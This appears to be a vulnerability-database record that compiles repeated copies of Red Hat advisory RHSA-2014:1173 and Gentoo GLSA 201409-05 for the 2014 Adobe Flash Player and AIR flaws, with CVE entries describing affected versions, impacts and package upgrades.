flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0547.html
https://www.redhat.com/security/data/cve/CVE-2014-0548.html
https://www.redhat.com/security/data/cve/CVE-2014-0549.html
https://www.redhat.com/security/data/cve/CVE-2014-0550.html
https://www.redhat.com/security/data/cve/CVE-2014-0551.html
https://www.redhat.com/security/data/cve/CVE-2014-0552.html
https://www.redhat.com/security/data/cve/CVE-2014-0553.html
https://www.redhat.com/security/data/cve/CVE-2014-0554.html
https://www.redhat.com/security/data/cve/CVE-2014-0555.html
https://www.redhat.com/security/data/cve/CVE-2014-0556.html
https://www.redhat.com/security/data/cve/CVE-2014-0557.html
https://www.redhat.com/security/data/cve/CVE-2014-0559.html
https://access.redhat.com/security/updates/classification/#critical
http://helpx.adobe.com/security/products/flash-player/apsb14-21.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U
PAXT7xPKbEDLocPPmOJo7t8=
=d7aB
-----END PGP SIGNATURE-----
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406"
References
==========
[ 1 ] CVE-2014-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547
[ 2 ] CVE-2014-0548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548
[ 3 ] CVE-2014-0549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549
[ 4 ] CVE-2014-0550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550
[ 5 ] CVE-2014-0551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551
[ 6 ] CVE-2014-0552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552
[ 7 ] CVE-2014-0553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553
[ 8 ] CVE-2014-0554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554
[ 9 ] CVE-2014-0555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555
[ 10 ] CVE-2014-0556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556
[ 11 ] CVE-2014-0557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557
[ 12 ] CVE-2014-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201409-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201409-0428 | CVE-2014-0559 | Adobe Flash Player and Adobe AIR Heap-based buffer overflow vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-0556. This is a different vulnerability from CVE-2014-0556. An attacker could execute arbitrary code. Failed exploit attempts likely result in denial-of-service conditions.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2014:1173-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html
Issue date: 2014-09-10
CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549
CVE-2014-0550 CVE-2014-0551 CVE-2014-0552
CVE-2014-0553 CVE-2014-0554 CVE-2014-0555
CVE-2014-0556 CVE-2014-0557 CVE-2014-0559
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
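3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These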
vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21,
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551,
CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556,
CVE-2014-0557, CVE-2014-0559)
A flaw in flash-plugin could allow an attacker to bypass the same-origin
policy.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21)
1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0547.html
https://www.redhat.com/security/data/cve/CVE-2014-0548.html
https://www.redhat.com/security/data/cve/CVE-2014-0549.html
https://www.redhat.com/security/data/cve/CVE-2014-0550.html
https://www.redhat.com/security/data/cve/CVE-2014-0551.html
https://www.redhat.com/security/data/cve/CVE-2014-0552.html
https://www.redhat.com/security/data/cve/CVE-2014-0553.html
https://www.redhat.com/security/data/cve/CVE-2014-0554.html
https://www.redhat.com/security/data/cve/CVE-2014-0555.html
https://www.redhat.com/security/data/cve/CVE-2014-0556.html
https://www.redhat.com/security/data/cve/CVE-2014-0557.html
https://www.redhat.com/security/data/cve/CVE-2014-0559.html
https://access.redhat.com/security/updates/classification/#critical
http://helpx.adobe.com/security/products/flash-player/apsb14-21.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U
PAXT7xPKbEDLocPPmOJo7t8=
=d7aB
-----END PGP SIGNATURE-----
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406"
References
==========
[ 1 ] CVE-2014-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547
[ 2 ] CVE-2014-0548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548
[ 3 ] CVE-2014-0549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549
[ 4 ] CVE-2014-0550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550
[ 5 ] CVE-2014-0551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551
[ 6 ] CVE-2014-0552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552
[ 7 ] CVE-2014-0553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553
[ 8 ] CVE-2014-0554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554
[ 9 ] CVE-2014-0555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555
[ 10 ] CVE-2014-0556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556
[ 11 ] CVE-2014-0557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557
[ 12 ] CVE-2014-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201409-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201409-0427 | CVE-2014-0547 | Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, and CVE-2014-0555. This is a different vulnerability from CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, and CVE-2014-0555. An attacker could execute arbitrary code or cause a denial of service (memory corruption).
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Security flaws exist in several Adobe products.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2014:1173-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html
Issue date: 2014-09-10
CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549
CVE-2014-0550 CVE-2014-0551 CVE-2014-0552
CVE-2014-0553 CVE-2014-0554 CVE-2014-0555
CVE-2014-0556 CVE-2014-0557 CVE-2014-0559
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21,
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551,
CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556,
CVE-2014-0557, CVE-2014-0559)
A flaw in flash-plugin could allow an attacker to bypass the same-origin
policy.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21)
1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0547.html
https://www.redhat.com/security/data/cve/CVE-2014-0548.html
https://www.redhat.com/security/data/cve/CVE-2014-0549.html
https://www.redhat.com/security/data/cve/CVE-2014-0550.html
https://www.redhat.com/security/data/cve/CVE-2014-0551.html
https://www.redhat.com/security/data/cve/CVE-2014-0552.html
https://www.redhat.com/security/data/cve/CVE-2014-0553.html
https://www.redhat.com/security/data/cve/CVE-2014-0554.html
https://www.redhat.com/security/data/cve/CVE-2014-0555.html
https://www.redhat.com/security/data/cve/CVE-2014-0556.html
https://www.redhat.com/security/data/cve/CVE-2014-0557.html
https://www.redhat.com/security/data/cve/CVE-2014-0559.html
https://access.redhat.com/security/updates/classification/#critical
http://helpx.adobe.com/security/products/flash-player/apsb14-21.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406"
References
==========
[ 1 ] CVE-2014-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547
[ 2 ] CVE-2014-0548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548
[ 3 ] CVE-2014-0549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549
[ 4 ] CVE-2014-0550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550
[ 5 ] CVE-2014-0551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551
[ 6 ] CVE-2014-0552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552
[ 7 ] CVE-2014-0553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553
[ 8 ] CVE-2014-0554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554
[ 9 ] CVE-2014-0555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555
[ 10 ] CVE-2014-0556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556
[ 11 ] CVE-2014-0557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557
[ 12 ] CVE-2014-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201409-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201409-0426 | CVE-2014-0557 | Adobe Flash Player and Adobe AIR vulnerability that circumvents the ASLR protection mechanism |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 do not properly restrict discovery of memory addresses, which allows attackers to bypass the ASLR protection mechanism via unspecified vectors. Adobe Flash Player and AIR are prone to multiple unspecified memory-corruption vulnerabilities.
Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Attackers can exploit this vulnerability to bypass the ASLR protection mechanism and take control of the affected system.
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2014:1173-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html
Issue date: 2014-09-10
CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549
CVE-2014-0550 CVE-2014-0551 CVE-2014-0552
CVE-2014-0553 CVE-2014-0554 CVE-2014-0555
CVE-2014-0556 CVE-2014-0557 CVE-2014-0559
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21,
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551,
CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556,
CVE-2014-0557, CVE-2014-0559)
A flaw in flash-plugin could allow an attacker to bypass the same-origin
policy.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21)
1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0547.html
https://www.redhat.com/security/data/cve/CVE-2014-0548.html
https://www.redhat.com/security/data/cve/CVE-2014-0549.html
https://www.redhat.com/security/data/cve/CVE-2014-0550.html
https://www.redhat.com/security/data/cve/CVE-2014-0551.html
https://www.redhat.com/security/data/cve/CVE-2014-0552.html
https://www.redhat.com/security/data/cve/CVE-2014-0553.html
https://www.redhat.com/security/data/cve/CVE-2014-0554.html
https://www.redhat.com/security/data/cve/CVE-2014-0555.html
https://www.redhat.com/security/data/cve/CVE-2014-0556.html
https://www.redhat.com/security/data/cve/CVE-2014-0557.html
https://www.redhat.com/security/data/cve/CVE-2014-0559.html
https://access.redhat.com/security/updates/classification/#critical
http://helpx.adobe.com/security/products/flash-player/apsb14-21.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406"
References
==========
[ 1 ] CVE-2014-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547
[ 2 ] CVE-2014-0548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548
[ 3 ] CVE-2014-0549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549
[ 4 ] CVE-2014-0550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550
[ 5 ] CVE-2014-0551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551
[ 6 ] CVE-2014-0552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552
[ 7 ] CVE-2014-0553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553
[ 8 ] CVE-2014-0554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554
[ 9 ] CVE-2014-0555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555
[ 10 ] CVE-2014-0556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556
[ 11 ] CVE-2014-0557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557
[ 12 ] CVE-2014-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201409-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201409-0425 | CVE-2014-0556 | Adobe Flash Player and Adobe AIR Vulnerable to heap-based buffer overflow |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-0559. An attacker could execute arbitrary code. Failed exploit attempts likely result in denial-of-service conditions.
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2014:1173-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html
Issue date: 2014-09-10
CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549
CVE-2014-0550 CVE-2014-0551 CVE-2014-0552
CVE-2014-0553 CVE-2014-0554 CVE-2014-0555
CVE-2014-0556 CVE-2014-0557 CVE-2014-0559
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
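3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These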
vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21,
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551,
CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556,
CVE-2014-0557, CVE-2014-0559)
A flaw in flash-plugin could allow an attacker to bypass the same-origin
policy.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
